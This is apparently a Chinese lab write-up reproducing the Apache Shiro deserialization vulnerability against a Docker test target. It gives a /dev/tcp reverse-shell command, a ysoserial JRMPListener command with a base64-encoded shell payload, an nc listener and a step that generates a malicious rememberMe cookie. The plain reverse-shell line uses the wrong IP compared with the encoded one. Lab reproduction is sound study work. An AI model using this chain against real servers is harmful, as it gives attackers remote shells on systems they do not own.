shiro反序列化漏洞复现

搭建环境请参考:https://www.jianshu.com/p/0007eafd1f92
复现请参考:https://mp.weixin.qq.com/s/KkWL9SftCZSdkglW39Qw0Q
靶机:192.168.19.147
攻击机:192.168.19.146

搭建环境

  • 获取docker镜像
    docker pull medicean/vulapps:s_shiro_1
  • 重启docker
    systemctl restart docker
  • 启动docker镜像:
    docker run -d -p 8081:8080 medicean/vulapps:s_shiro_1
    访问:
    http://192.168.19.147:8081/ 环境搭建成功
    在这里插入图片描述

制作反弹shell 代码

  • 使用http://www.jackson-t.ca/runtime-exec-payloads.html 进行编码

bash -I >& /dev/tcp/192.168.19.147/1234 0>&1
在这里插入图片描述

使用ysoserial中JRMP监听模块,监听6666端口

  • 攻击机中执行命令:
    java -cp ysoserial.jar ysoserial.exploit.JRMPListener 6666 CommonsCollections4 'bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE5LjE0Ni8xMjM0IDA+JjE=}|{base64,-d}|{bash,-i}'
    在这里插入图片描述

监听反弹端口 1234

  • 攻击机中执行命令:
    nc -lvnp 1234
    在这里插入图片描述

生成poc

  • 攻击机中执行
    python shiro.py 192.168.19.146:6666
    得到rememberMe
    在这里插入图片描述

利用POC进行攻击:

登录系统:
在这里插入图片描述
抓取登录后的数据包:
在这里插入图片描述
发送修改后的数据包,攻击成功
在这里插入图片描述
成功获取shell
在这里插入图片描述

评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值